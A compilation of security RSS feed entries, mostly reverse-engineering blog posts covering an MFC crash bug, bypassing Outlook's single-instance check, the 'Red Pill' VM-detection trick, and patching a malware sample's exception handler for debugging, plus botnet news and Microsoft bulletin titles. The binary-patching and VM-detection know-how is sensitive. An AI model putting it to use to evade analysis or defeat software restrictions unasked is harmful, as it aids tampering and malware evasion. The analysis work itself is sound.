http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was developing some automation code recently and found that a process that I was injecting code into was crashing. At first I thought it was an error in my injected code, but when I looked at the crash-dump, I was amazed to see that the issue was in MFC42.DLL: MOV EBX,104 PUSH EBX LEA EAX,DWORD PTR SS:[EBP+szBuffer] PUSH EAX PUSH DWORD PTR DS:[ESI+6C] CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA> LEA EAX,DWORD PTR SS:[EBP+szBuffer] PUSH 2E PUSH EAX CALL DWORD PTR DS:[<&msvcrt._mbsrchr>] POP ECX POP ECX MOV DWORD PTR SS:[EBP-80],EAX MOV BYTE PTR DS:[EAX],0 <-- Crash! The code above is from MFC42.DLL, version 6.2.4131.0 from Windows XP SP2. It effectively does the following: GetModuleFileName(NULL, szBuffer, MAX_PATH); *(_mbsrchr(szBuffer, '.')) = 0; The function _mbsrchr(...) returns NULL if the character searched for is not found. This means that if there is no '.' in the current process's filename (which was the case for the file I was testing) then the highlighted line above will try to write the byte 0x00 to address 0x00000000, which will cause a crash. I figured that this was some obscure function from MFC42.DLL that most applications don't make use of, however, after a little digging it turns out that this code is in CWinApp::SetCurrentHandles(), which is called by AfxWinInit(...). From http://msdn2.microsoft.com/en-us/library/w04bs753(vs.80).aspx: "[AfxWinInit] is called by the MFC-supplied WinMain function, as part of the CWinApp initialization of a GUI-based application, to initialize MFC." In other words, almost every MFC GUI program executes the code snippet above! AAs surprised as I was by this, I figured that surely this had been fixed for Vista. Believe it or not, the same issue exists! Below is the code from MFC42.DLL version 6.6.8063.0 from Windows Vista Gold: PUSH 104 LEA EDX,DWORD PTR SS:[EBP+szBuffer] MOV [EDI+0C],ECX MOV EAX,DWORD PTR DS:[ESI+6C] PUSH EDX PUSH EAX CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA> TEST EAX,EAX JZ LOC_722F1484 CMP EAX,104 JZ LOC_722F1484 LEA ECX,[EBP+szBuffer] PUSH 2E PUSH ECX CALL __mbsrchr MOV EBX,EAX ADD ESP,8 TEST EBX,EBX MOV [EBP+VAR_310],EBX JZ LOC_7230DB7D ...
__mbsrchr: MOV EDI,EDI PUSH EBP MOV EBP,ESP POP EBP JMP DWORD PTR DS:[<&msvcrt._mbsrchr>]
LOC_7230DB7D: ... JMP DWORD PTR DS:[<&msvcrt.CxxThrowException>] While the code above checks for the lack of a '.' in the filename, it still throws an exception and causes a crash if there's no '.'. The good news is that it doesn't seem easy to accidentally execute an executable file without a '.' in the filename in Vista: C:\>copy c:\windows\notepad.exe notepad_exe 1 file(s) copied. C:\>notepad_exe 'notepad_exe' is not recognized as an internal or external command, operable program or batch file. C:\>start notepad_exe [This opens the "Open With" dialog box in Explorer instead of executing the file.] However, it is still possible to run non-dotted-files via API functions like CreateProcess(...) to cause the crash described above.

==> Refreshing the Taskbar Notification Area

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I am working on an automation system that involves forcefully terminating a process that creates an icon in the Taskbar Notification Area (no, not the "system tray"). It is the responsibility of the process that creates an icon in the Taskbar Notification Area to remove the icon when the process exits, however, since I am using TerminateProcess(...) to remotely kill the process, the code to remove the icon never gets executed. As such, the icon remains in the Taskbar Notification Area until one moves the mouse cursor over the icon, at which point it disappears. Since this is an automation system that's being developed, this icon-creating process will get executed many times, and if left unchecked would end up leaving hundreds of icons in the Taskbar Notification Area (one icon per execution). That's bad. Despite my best Googling efforts ("refresh notification area", "redraw system tray", etc.), I wasn't able to find elegant code to solve this problem. I found some novel solutions, though. The most common suggestion was to use SetCursor(...) to drag the mouse cursor around the Taskbar Notification Area; while this works, it's an ugly hack and is actually quite slow. One of my "favorite" suggestions was to try to associate each icon in the Taskbar Notification Area with a process, then monitoring each process for termination, then deleting the icon once the given process terminates (talk about overkill... geeze). When a user moves the mouse over a "dead icon" in the Taskbar Notification Area, some window message must get sent to the window to cause it to say to itself, "hey, the mouse is over me, so let me see if the process that created this icon is still alive.... Oh, it's not? Let me remove the icon, then." I wanted to find what window message was causing that code to fire so that I could send that message to the window myself. I started up Microsoft Spy++ and saw the following information for the Taskbar Notification Area and its parent windows: A useful feature of Microsoft Spy++ is that it allows you to monitor window messages sent to a given window. I started monitoring the window messages getting sent to the "Notification Area" window without moving my mouse over the window and saw the following messages getting sent: * TB_BUTTONCOUNT * TB_GETBUTTONINFOW * TB_SETBUTTONINFOW * WM_PAINT * WM_ERASEBKGND The messages above clearly had nothing to do with me moving my mouse (since I wasn't moving my mouse over the window), so I configured Microsoft Spy++ to filter out those messages. Then I moved my mouse over the "dead icon" in question and saw the following messages: <00001> 00010056 S WM_NCHITTEST xPos:1491 yPos:1024 <00002> 00010056 R WM_NCHITTEST nHittest:HTCLIENT <00003> 00010056 S WM_SETCURSOR hwnd:00010056 nHittest:HTCLIENT wMouseMsg:WM_MOUSEMOVE <00004> 00010056 R WM_SETCURSOR fHaltProcessing:False <00005> 00010056 P WM_MOUSEMOVE fwKeys:0000 xPos:5 yPos:0 <00006> 00010056 S TB_HITTEST pptHitTest:022BFC18 <00007> 00010056 R TB_HITTEST iIndex:0 <00008> 00010056 S TB_DELETEBUTTON iButton:0 <00009> 00010056 R TB_DELETEBUTTON fSucceeded:True Aha! So either WM_NCHITTEST, WM_SETCURSOR, WM_MOUSEMOVE, or TB_HITTEST leads to the TB_DELETEBUTTON getting sent. After trying to send each window message manually with SendMessage(...), I found which window message was the catalyst: WM_MOUSEMOVE. With this new-found knowledge, I was able to whip up the following code to refresh the Taskbar Notification Area: #define FW(x,y) FindWindowEx(x, NULL, y, L"") void RefreshTaskbarNotificationArea() { HWND hNotificationArea; RECT r; GetClientRect( hNotificationArea = FindWindowEx( FW(FW(FW(NULL, L"Shell_TrayWnd"), L"TrayNotifyWnd"), L"SysPager"), NULL, L"ToolbarWindow32", L"Notification Area"), &r); for (LONG x = 0; x < r.right; x += 5) for (LONG y = 0; y < r.bottom; y += 5) SendMessage( hNotificationArea, WM_MOUSEMOVE, 0, (y << 16) + x); }

==> Stateless Bi-Directional Proxy

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx After submitting my first patent two years ago to the US Patent Office, it has finally been published online! You can read all the juicy details here and you can see diagrams here if you have a TIFF-renderer browser plug-in. This patent was from when I was still on the Firewall team at Microsoft, so it's network-related. The other patents of mine that should get published on the web over the next two years are from when I was on the Anti-Malware team at Microsoft, so they're related to binary analysis... in other words, even cooler than this one ;)

==> Investigating Outlook's Single-Instance Restriction (PART 1)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx If you use Outlook and have multiple e-mail account profiles, you know how frustrating it is to have Outlook restrict you to a single running instance of Outlook per interactive login. For those of you not familiar with this "feature", here's the scoop: if you have one instance of Outlook running and then launch another instance, a new Outlook window is created in the context of the original instance, but you don't have the option to load another e-mail account profile. This is a pain because it requires you to close and restart Outlook each time you want to check a different e-mail account (assuming you have a separate profile for each account). Tim Mullen, a colleague of mine, had the ingenious idea of using RunAs to launch the second Outlook process as another user, to try to circumvent whatever "feature" was restricting Outlook to a single instance. "What a great idea!" I thought, and I kicked myself for not having thought of that myself! But when we tested it out, it had the same results as running a second instance of Outlook without RunAs; an extra window popped up for the first instance and we weren't given the option to load another profile. This piqued my interest and I wondered how Outlook was determining whether or not another instance was already running in the interactive login session. Typically when I'm trying to figure out how specific functionality works, I have an API function or string to use as my guide. For example, if I'm red-teaming a DRM solution and I get a message box saying, "Invalid license key." then I can search in the binary for that string to see what code references it, or I can set a breakpoint on the Windows API functions that display message boxes. However, for the case of Outlook here, I didn't have any strings to base my investigation on, and I didn't know which API function(s) were being used to check for the first instance. My first idea was to use an API logging tool like AutoDebug and run it once on the first Outlook session and once on the second Outlook session. I could then compare the API call logs and see where they differed, and then begin to investigate what caused them to differ at that point. However, I quickly found that API loggers such as AutoDebug are not suited for such a heavyweight program as Outlook (which imports a few thousand DLLs and a few million API functions (yes, I'm exaggerating, but it's still a lot)). My second idea was to use a conditional-branch logger, such as http://www.woodmann.com/ollystuph/Conditional_Branch_Logger_v1.0.zip and run the same comparison as described above. However, I didn't have that plugin downloaded at the time and I didn't have Internet access, so I had to make-do with what was already on my laptop. I used Process Explorer to watch what happens when the second instance of Outlook is launched. Sure enough, the process starts and then terminates. So I used OllyDbg to set a breakpoint on ExitProcess(...) to see if I could get a decent call-stack to see what code in Outlook led to the ExitProcess(...) call. The good news is that this allowed me to find the code that led to the process termination. The bad news is that it was called via _cexit(...) from ___tmainCRTStartup(...), so whatever code was detecting the first instance of Outlook was bailing out via ret's, not via a direct call to _cexit(...) or ExitProcess(...). This led me to the old trustworthy Trial-and-Error-with-F8 method. The idea is simple -- starting from the process's Entry Point, step over (F8 in OllyDbg) every function call until you see the desired results, at which point you know the code in question lies within that function call. For this case, I was watching for a new window to pop up in the context of the first Outlook instance; by that time the check would already have been made to see if another instance of Outlook was running. The great thing about this approach is that it's incredibly straight-forward. The downside is that if you're looking for functionality that doesn't happen near the beginning of the process execution, it can be very time consuming. Luckily though, this method worked like a charm for Outlook! I started the second Outlook process in OllyDbg, stepped over the first call and into a jump. No windows popped up yet, so I hadn't yet stepped over the call-in-question. I kept pressing F8 until I found that when I tried stepping over the call from address 0x2FD251C8 (this of course is specific to my computer; your addresses will differ), an Outlook window popped up in the context of the first Outlook process. So I set a breakpoint on 0x2FD251C8 and restarted my second Outlook process, this time stepping in (F7) to that call and pressing F8 again until I found the next call that opened the first Outlook window. I found that stepping over the call at address 0x2FD25228 caused the window to pop up, so I set a breakpoint on that address, restarted, stepped in, and continued this process for about two minutes until I found the following code: .text:30006BB7 push offset WindowName ; "Microsoft Outlook" .text:30006BBC push offset aMspim_wnd32 ; "mspim_wnd32" .text:30006BC1 mov [ebp+var_42C], edi .text:30006BC7 call ds:FindWindowA This looks like the culprit! During Outlook's initialization, it checks to see if a window named "Microsoft Outlook" with class name "mspim_wnd32" exists, and if so, it assumes that another instance is already running. To test this, I set the return value of FindWindowA(...) from the call above to NULL, and Outlook opened a full second instance of itself in a separate process, and allowed me to use a different account profile. This is a great example of where a very straight-forward reverse-engineering approach (Trial-and-Error-with-F8) can yield excellent results in just a few minutes given the right conditions. As a disclaimer, I don't know the reason that the Outlook development team decided to restrict Outlook to a single instance. Perhaps multiple instances will cause massive data corruption. In other words, if you're going to patch your Outlook executable so that it does allow for multiple instances, do so at your own risk! This post continued in Part 2.

==> Career Shift

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Friday, April 20th will be my final day at Microsoft. I will be joining NGS in the coming weeks as a Principal Security Consultant. I've copied all of my old blog posts from http://blogs.msdn.com to http://www.malwareanalysis.com though unfortunately I was not able to save the old comments. My new personal e-mail address is jasonATmalwareanalysisDOTcom.

==> When the Red Pill is Hard to Swallow

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was looking at a malware sample last week that used a variation of Joanna Rutkowska's infamous Red Pill (http://invisiblethings.org/papers/redpill.html) to determine whether or not the malware was being run from inside a Virtual Machine. Based on the Red Pill concept, the guest OS's IDTR should be different from the host OS's IDTR. I was using Virtual PC to step through the malware sample in OllyDbg, with the goal of skipping the conditional-jump after SIDT led to the detection of my VM (see http://download.intel.com/design/Pentium4/manuals/25366720.pdf#page=275 for details on the SIDT instruction). You can imagine my surprise when SIDT returned 0x8003F400 as the base address of the IDT, which is the same base address of the IDT for my host Windows XP system! My first thought was that maybe the Virtual PC team figured out some ingenious way to make this happen via the Virtual Machine Additions add-on (see http://www.microsoft.com/technet/prodtechnol/virtualserver/2005/proddocs/vs_tr_components_additions.mspx?mfr=true). So I uninstalled Virtual Machine Additions, rebooted, and tried again. To my continued surprise, OllyDbg was still showing the host OS's IDTR when stepping through the SIDT instruction on my guest OS. After some more thinking, I thought, "maybe it has something to do with the fact that I'm single-stepping through SIDT in OllyDbg." To test this hypothesis, I set a breakpoint after the SIDT instruction, and ran the program from the start. Sure enough, SIDT returned 0xF9CB6440 as the base address of the IDT that time. The whole trick behind the Red Pill is that VMs don't typically have the opportunity to intercept SIDT since it's not a privileged instruction. However, when the Trap Flag is set (due to single-stepping), Virtual PC intercepts the int 1 interrupt and can execute the current instruction however it pleases; when it has the opportunity, it will use the host's IDTR for the SIDT instruction. Hopefully this knowledge will make the Red Pill a little easier for you to swallow (or spit-out if the Trap Flag is set).

==> Terms of the Trade

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx It is common to hear reverse engineers throw around the phrase, forty-thousand hex. To someone unfamiliar with reverse engineering or debugging in Windows, this phrase would probably be interpreted to mean the value 0x00040000. However, when reverse engineers say, forty-thousand hex, they are actually referring to the value 0x00400000. The value 0x00400000 is commonly seen when doing low-level work in Windows because this is the default base address of EXE files compiled by Microsofts C++ compiler. So why say forty-thousand hex instead of four-hundred-thousand hex? For starters, the former is easier to say (one less syllable) than the latter. But more importantly, hexadecimal numbers are usually grouped in sets of 2-digits (bytes) instead of in groups of 3-digits as in base 10. As such, a reverse engineer could read 0x00400000 as 0x00,40,00,00. Going from right-to-left, we have 00 in the tens place, 00 in the hundreds place, and 40 in the thousands place.

==> Circumventing custom SEH

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I do most of my malware analysis statically, which is to say that I typically analyze malware by looking at a static disassembly of it as opposed to stepping through it in a debugger. However, sometimes I come across complicated or confusing code that would be easier to understand by walking through it in a debugger. I came across such an example the other day. An important branch decision was being made based on the result of a function that used a stack variable that IDA Pro couldn't represent in a simple way. Here's a snippet from the function: mov edx, [ebp+arg_0] add edx, 108h push edx I could have traced back in the disassembly to figure out what arg_0 + 108h was really pointing to (it turned out to be a global variable and arg_0 was set by the caller of the caller of this function), but I thought that I could save time by loading the target into a debugger and setting a breakpoint on the code above in order to determine what was actually being pushed. There was a problem, though. This malware launced other instances of itself, and setting a breakpoint on the code above in a debugger didn't work since the parent process never executed that code, only the bleep instances did. I could have set a breakpoint on CreateProcessA(...), forced it to load the bleep processes in a suspended state, attached a debugger to the bleep, then resumed them, but this was more trouble than it was worth. Instead, I opted for another method of attack. I configured my debugger for Just-In-Time (JIT) debugging (see http://support.microsoft.com/default.aspx?scid=kb;en-us;103861) so that I could attach to a crashed process via the Microsoft Application Error Reporting dialog box (also known as "Dr. Watson" -- see http://blogs.msdn.com/oldnewthing/archive/2005/08/10/449866.aspx). I then overwrote the code above with an int 3 and patched the file, with the expectation that after running the parent program that this would crash the bleep process, cause the Microsoft Application Error Reporting dialog box to pop up, and allow me to attach to the crashed bleep process. (It should be noted that this was done on an isolated network in a very controlled environment, and with all of our safeguards in place it was practically impossible for the modified malware to get out of our secure lab.) I saved the patched file and ran it, waiting eagerly for the Microsoft Application Error Reporting dialog box to appear. To my surprise, nothing happened. As it turned out, the program was using custom Structured Exception Handling (SEH) routines and because of this the int 3 exception was never passed to the operating system so the Microsoft Application Error Reporting dialog box never popped up. To remediate this, I changed my int 3 patch to the following: mov eax, fs:[0] mov [eax+4], 7c8399f3h int 3 This effectively overwrote the first exception handler in the SEH chain (see http://www.microsoft.com/msj/0197/exception/exception.aspx) with the default exception handler from kernel32.dll. The address of this handler is of course version-specific; in my case kernel32.dll was US English version 5.1.2600.2180. With this patch in place, the Microsoft Application Error Reporting dialog box popped up for the bleep process and I was able to attach my debugger and determine the value of arg_0 + 108h from the original code above.

==> FortiExplorer 2.3.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 2.3.0 B1052 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MS Windows 7, MS Windows Vista, MS Windows XP, * Mac OS X 10.6

==> FortiExplorer 2.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 2.2.0 B1046 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MS Windows 7, MS Windows Vista, MS Windows XP, * Mac OS X 10.6

==> Microsoft attempts legal action to disrupt some Zeus botnets

http://rss.techtarget.com/981.xml Legal and technical actions could disrupt some Zeus botnet operations by seizing command-and-control servers in Pennsylvania and Illinois.

==> Secure Application Development

http://securosis.com/feeds/research Secure application development is about building secure software. Most security products offer band-aid protection for existing applications: they filter, block, or proxy communications to/from applications that are incapable of protecting themselves. We want to get away from this “Features first, security second” model and code applications that are self-reliant and can protect themselves. The secure code movement is in its infancy. There are different processes, training programs, and tools to aid the development of secure applications – which we will cover here. We will also reference some of the OWASP and Rugged Software projects. Papers and Posts ------------ * FireStarter: Agile Development and Security * Comments on Microsoft Simplified SDL * Rock Beats Scissors, and People Beat Process * FireStarter: Secure Development Lifecycle – You’re Doing It Wrong * Structured Security Program, Meet Agile Process * FireStarter: For Secure Code, Process Is a Placebo – It’s All about Peer Pressure * Are Secure Web Apps Possible? * Clickjacking Details, Analysis, and Advice Presentations --------- Security + Agile = FAIL Podcasts, Webcasts, and Multimedia
We do not currently have multimedia for this topic. Vendors --- We’ll include white and black box analysis, fuzzing, and tools vendors. This list is currently evolving, and we’ll include other firms as time permits. * Cigital * HP (SpiDynamics, Fortify) * IBM (Ounce) * Veracode * WhiteHat Security Subscribe to our daily email digest

==> Encryption

http://securosis.com/feeds/research Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on encryption is Understanding and Selecting a Database Encryption or Tokenization Solution. 2. Your Simple Guide to Endpoint Encryption. 3. Post on the Three Laws of Data Encryption. 4. Format and Datatype Preserving Encryption 5. Post on When to Layer Encryption. 6. Application vs. Database Encryption. 7. The post Database Media Protection focuses on threats to storage media, and some follow-up comments on Database Media Threats. 8. The Data Security Lifecycle covers encryption during the movement and storage of data. General Coverage ------------ 1. Tokenization Will Become the Dominant Payment Transaction Architecture 2. Visa’s Data Field Encryption 3. Boaz Nails It- The Encryption Dilemma 4. “PIN Crackers” and Data Security, looking at attacks on encryption. 5. Part of the core value of Data Centric Security is the ability to protect data regardless of where it moves or resides, which is facilitated by encryption. This is discussed in Part 1 and Part 2 of the Best Practices for Endpoint Security. 6. An editorial on how parts of the U.S. intelligence community discourage the adoption of encryption, as it is counterproductive to their mission. 7. This post discusses Digital Rights Management (DRM) as it pertains to Cloud Computing and content protection. Presentations --------- * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * This presentation is on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). Being here does not imply any endorsement; this list is simply meant to assist you if should you should start looking for tools. Please email info@securosis.com if you have any additions or corrections.
Enterprise/General Encryption Providers * Certicom. * CheckPoint. * Entrust. * GuardianEdge. * IBM. * nuBridges. * Prime Factors Inc. * RSA. * SafeNet. * Sophos (Utimaco). * Symantec (PGP). * Thales (nCipher) * TruCrypt. * Venafi. * Voltage. * Vormetric. * WinMagic. Endpoint Encryption Vendors * beCrypt. * Credant. * DESLock. * McAfee (SafeBoot). * Microsoft (BitLocker). * Namo. * Secude. * Secuware. Database Encryption Vendors * IBM. * NetLib. * Oracle. * Relational Wizards. * RSA (Valyd). * SafeNet (Ingrian). * Sybase. * Thales (nCipher). * Voltage. * Vormetric. Key Management, Certificate and other tools * Entrust. * Prime Factors Inc. * RSA * Symantec (Verisign). * Thales Subscribe to our daily email digest

==> Cloud Computing Security

http://securosis.com/feeds/research This section of the research library is dedicated to all things Cloud. Mostly we will cover Cloud Security, but along with this week need to have some understanding of what ‘The Cloud’ actually is, and what the major variations look like. We will also cover SaaS and Virtualization under this space; not because they are ‘The Cloud’, but they involve a Cloud-like model in many cases. We will be adding a lot of content to this section in the coming weeks. Papers and Posts ------------ * Rich’s series defining a Cloud Security Data Lifecycle: Introduction, Create, Store, Use, Share, Archive and Delete. * Securing the Cloud with Virtual Private Storage. * How The Cloud Destroys Everything I Love about Web Application Security. Presentations --------- * Understanding Cloud Security in 30 Minutes or Less! Podcasts, Webcasts and Multimedia
Chris Hoff co-hosts the Network Security Podcast, and talks about the Microsoft/EM partnership, Liquid Machines and Information Centric Security. Oh, he mentions a few things on ‘The Cloud’ too. Subscribe to our daily email digest

==> More DEF CON 19 News

https://www.defcon.org/defconrss.xml Things are starting to heat up for DEF CON 19! Here are a few of the recent developments: DEF CON Scavenger Hunt has SPONSORS!! ThinkGeek.com and evilmadscientist.com are confirmed sponsors of the scavenger hunt, they will be offering up prizes and special offers. They won't announce specific prizes until at Def con but good news is we know that Think Geek will be offering a discount code, usable for ordering off their website during the convention, limited time offer! The coupon code for ThinkGeek DEF CON attendees will be made available at the Scavenger Hunt table in the contest area and will be announced via our twitter feeds @_Defcon_ and @defconscavhunt. Here is a throwback to the past! Check out this Scavenger hunt list from 14yrs ago! We hope you enjoy a little nostalgia from DEF CON 5 courtesy of Mike Schrenk! Skytalks CFP is Open! From the DEF CON Forums: TLDR: Who: You What: Skytalks IV CFP When: Now - CFP Closes 23:59:59 MDT (UTC-06) 31 May 2011 Why: Because you've got the warez to share Where: dcskytalks@gmail.com - WE RESERVE THE RIGHT TO POINT AND LAUGH IF WE CAN'T READ YOUR bleep IN A TEXT EDITOR. THIS MEANS YOU, MICROSOFT WORD USERS. Updates: http://is.gd/5Y8eyM Back by popular demand, Skytalks returns for its fourth year of technical prowess, side-track talks, and semi-coherent rants by some of the legends of the community. Never mind that we aren't actually IN a skybox this year, we'll still fill it to capacity, have lines running down the hallways for three talks in advance, and we'll recapture that original Defcon spirit and party like it's 1992. (Read on) You can track the movements of Skytalks on Facebook and Twitter as well: Facebook: http://is.gd/0d8skZ Twitter: @dcskytalks DC101 Site You can keep up on what's happening with DEF CON 101 by checking out the the new site at http://defcon.stotan.org/dc101/ DEF CON 19 Vendor Area! The vendor area at DEF CON 19 is growing by 1000 sq. ft. this year, so all of your favorite vendors will be back and maybe a few new ones! If you are interested in becoming a Vendor at DEF CON, Roamer has posted the updated Vendor FAQ at: http://defcon.hackingyour.net/vendor-FAQ.html As always, you can keep up on all of the latest DEF CON 19 news at https://www.defcon.org, the DEF CON RSS Feed, The DEF CON Twitter, or on the DEF CON Facebook Page!

==> Todd Moore, Treasure hunter contestant, spoke at DEFCON 12 on "Cracking Net2Phone"

https://www.defcon.org/defconrss.xml Since Todd has been announced as a participant on NBC's new show "Treasure Hunters" we have had more than enough curious folks interested in his presentation. We will be watching him on the new show when it airs, in the meantime you can watch him now on his Defcon 12:"Cracking Net2Phone" Presentation. Do you think using Internet Telephony is more secure than a regular phone? Think again! Internet Telephony is becoming more common and those that think it is safer from wiretaps than regular phone communications are wrong. This presentation will demonstrate how to decrypt Net2Phone's dialed phone numbers, and playback fully reconstructed audio conversations from network packet captures. Included will be a demonstration of NetWitness 5.0's VOIP playback capability. Todd Moore is the product manager of NetWitness, a commercially available cyber-forensics tool. Moore's extensive knowledge of Internet technologies, network security, and software development helped make NetWitness well-known for providing powerful insight into network traffic. Moore has over ten years of professional experience in the field of network security and has extensive experience developing commercial software applications. He has a bachelor in Computer Science from Old Dominion University and is a Microsoft Certified Solution Developer (MCSD). Moore started with CTX Corporation in 1996 securing global intranets and designing network security software to help audit and analyze network traffic. He joined Forensics Explorers, a Division of ManTech ISandT, as Director of Software Development in 1999 and later became the NetWitness Product Manager. Moore teaches classes on designing quality software and has made numerous television appearances presenting the latest in technology trends. He has two patent pending inventions in the field of cyber-forensics. Moore resides in the greater Washington, D.C. area.

==> remote - MS13-037 Microsoft Internet Explorer textNode Use-After-Free

http://www.1337day.com/rss

==> The Risks of Microsoft Exchange Features that Use Oracle Outside In

http://www.cert.org/blogs/vuls/rss.xml The WebReady and Data Loss Prevention (DLP) features in Microsoft Exchange greatly increase the attack surface of an Exchange server. Specifically, Exchange running on Windows Server 2003 is particularly easy to exploit.

==> Microsoft's Botnet Takedown Campaign: 10 Reasons It Keeps Doing It

http://www.eweek.com/rss-feeds-45.xml NEWS ANALYSIS: Microsoft has successfully worked with the FBI to take down a $500 million botnet. But why its working so hard to root out botnets might have to do with more than just your security.

==> Microsoft, FBI Shutter Citadel Botnets Seeking to End $500M Crime Spree

http://www.eweek.com/rss-feeds-45.xml Microsoft, financial groups and the FBI cooperated to take down botnets that used the Citadel bot software to control as many as 5 million compromised systems.

==> Microsoft: SMB Cloud Security Worries Easing

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Microsoft survey of 211 small businesses finds half use the cloud and after early experience, find it more reliable, secure.

==> Microsoft, FBI Trumpet Citadel Botnet Takedowns

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Joint operation is first in which law enforcement and private sector use civil seizure warrant to disrupt massive malware attack.

==> Patch Tuesday preview: June 2013

http://www.infosecurity-magazine.com/rss/news/ There are only five security bulletins from Microsoft this month, but with one involving versions of Internet Explorer from 6 to 10, and another involving an actively exploited Office vulnerability, administrators cannot afford to delay implementation.

==> Microsoft and the FBI take down more than 1000 Citadel botnets

http://www.infosecurity-magazine.com/rss/news/ Working with the FBI and the financial services industry, Microsoft last week obtained a court order allowing it to cut communications between 1462 Citadel botnets and the millions of infected PCs around the world.

==> Secunia names new CEO

http://www.infosecurity-magazine.com/rss/news/ Secunia, the Copenhagen-based provider of security software, announced the appointment of Microsofts Peter Colsted as the firms new chief executive.

==> Cisco challenges Microsoft’s acquisition of Skype

http://www.infosecurity-magazine.com/rss/news/ Cisco has challenged the ECs approval of Microsofts $8.5 billion acquisition of Skype in 2011 in the Luxembourg General Court. If Cisco is successful, the EC would be forced to annul its earlier approval.

==> Microsoft unveils cloud-based, real-time botnet info-sharing initiative

http://www.infosecurity-magazine.com/rss/news/ Microsoft has kicked off the Cyber Threat Intelligence Program (C-TIP), an outgrowth of its information-sharing initiative around botnets.

==> Is the Xbox One a Covert Surveillance Device?

http://www.infosecurity-magazine.com/rss/news/ When details about Microsofts new games console, the Xbox One, first began to emerge, privacy campaigners were immediately concerned: is the Xbox One an intrusive but covert surveillance device?

==> Microsoft Stops Predicting AV Samples to Focus on Ecosystem

http://www.infosecurity-magazine.com/rss/news/ The Microsoft Malware Protection center is shifting its research focus away from predicting test samples and instead focussing on prevalence-weighted response and family research.

==> Skype Beta Plugs IP Resolver Privacy Leak

http://www.krebsonsecurity.com/feed/ A few months ago, I warned readers that a glaring privacy weakness in voice-over-IP telephony service Skype allows anyone using the network to quickly learn the Internet address of any other Skype user. A new beta version of the popular Microsoft program appears to have nixed that privacy leak with a setting that restricts this capability to connections in your Skype contacts only.

==> IT Compliance Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This Solution Accelerator can help you shift your governance, risk, and compliance (GRC) efforts from people to technology. Use its configuration guidance to help efficiently address your organization's GRC objectives. See the online job aids for compliance.

==> Microsoft Operations Framework (MOF) 4.0

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml MOF 4.0 delivers practical guidance for everyday IT practices and activities, helping users establish and implement reliable, cost-effective IT services for governance, risk, and compliance (GRC) activities.

==> Security Compliance Management Toolkit

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This toolkit provides proven methods that your organization can use to effectively monitor the compliance state of recommended security baselines for Windows Vista, Windows XP Service Pack 2 (SP2), and Windows Server 2003 SP2.

==> Security Risk Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Security Risk Management Guide helps customers plan, build, and maintain a successful security risk management program.

==> SQL Server 2008 Compliance Guidance

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The SQL Server 2008 Compliance Guidance white paper is a complement to the SQL Server 2008 compliance software development kit (SDK).

==> Microsoft Security Assessment Tool

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Microsoft Security Assessment Tool (MSAT) consists of more than 200 questions designed to help identify and address security risks in IT environments. It includes best practices, standards such as ISO 17799, 27001 and NIST-800.x, as well as recommendations from the Microsoft Trustworthy Computing Group.

==> Microsoft Security Advisory (2854544): Update to Improve Cryptography and Digital Certificate Handling in Windows - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-051 - Important : Vulnerability in Microsoft Office Could Allow Remote Code Execution (2839571) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-050 - Important : Vulnerability in Windows Print Spooler Components Could Allow Elevation of Privilege (2839894) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-049 - Important : Vulnerability in Kernel-Mode Driver Could Allow Denial of Service (2845690) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-048 - Important : Vulnerability in Windows Kernel Could Allow Information Disclosure (2839229) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-047 - Critical : Cumulative Security Update for Internet Explorer (2838727) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Advance Notification for June 2013 - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-040 - Important : Vulnerabilities in .NET Framework Could Allow Spoofing (2836440) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS13-038 - Critical : Security Update for Internet Explorer (2847204) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-069 - Important : Vulnerability in Kerberos Could Allow Denial of Service (2743555) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

